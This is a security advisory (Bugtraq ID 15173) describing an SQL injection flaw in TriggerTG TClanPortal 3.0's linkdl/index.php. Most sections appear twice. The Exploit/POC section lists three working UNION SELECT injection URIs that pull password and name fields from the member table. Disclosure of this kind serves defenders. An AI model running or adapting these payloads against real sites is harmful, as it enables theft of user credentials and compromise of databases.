TriggerTG TClanPortal Index.PHP SQL Injection Vulnerability
BID:15173
Info
TriggerTG TClanPortal Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 15173 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 24 2005 12:00AM |
| Updated: | Oct 24 2005 12:00AM |
| Credit: | Abducter is credited with the discovery of this vulnerability. |
| Vulnerable: |
TriggerTG TClanPortal 3.0 |
| Not Vulnerable: | |
Discussion
TriggerTG TClanPortal Index.PHP SQL Injection Vulnerability
TClanPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
TClanPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
TriggerTG TClanPortal Index.PHP SQL Injection Vulnerability
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/ClanPortal/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=1/*
http://www.example.com/ClanPortal/linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20pw,null,null%20FROM%20member%20%20WHERE%20id=1/*
http://www.example.com/ClanPortal/linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20name,null,null%20FROM%20member%20%20WHERE%20id=1/*
The following proof of concept exploit is also available:
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/ClanPortal/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=1/*
http://www.example.com/ClanPortal/linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20pw,null,null%20FROM%20member%20%20WHERE%20id=1/*
http://www.example.com/ClanPortal/linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20name,null,null%20FROM%20member%20%20WHERE%20id=1/*
The following proof of concept exploit is also available:
Solution / Fix
TriggerTG TClanPortal Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
TriggerTG TClanPortal Index.PHP SQL Injection Vulnerability
References:
References:
- TClanPortal Homepage (TriggerTG)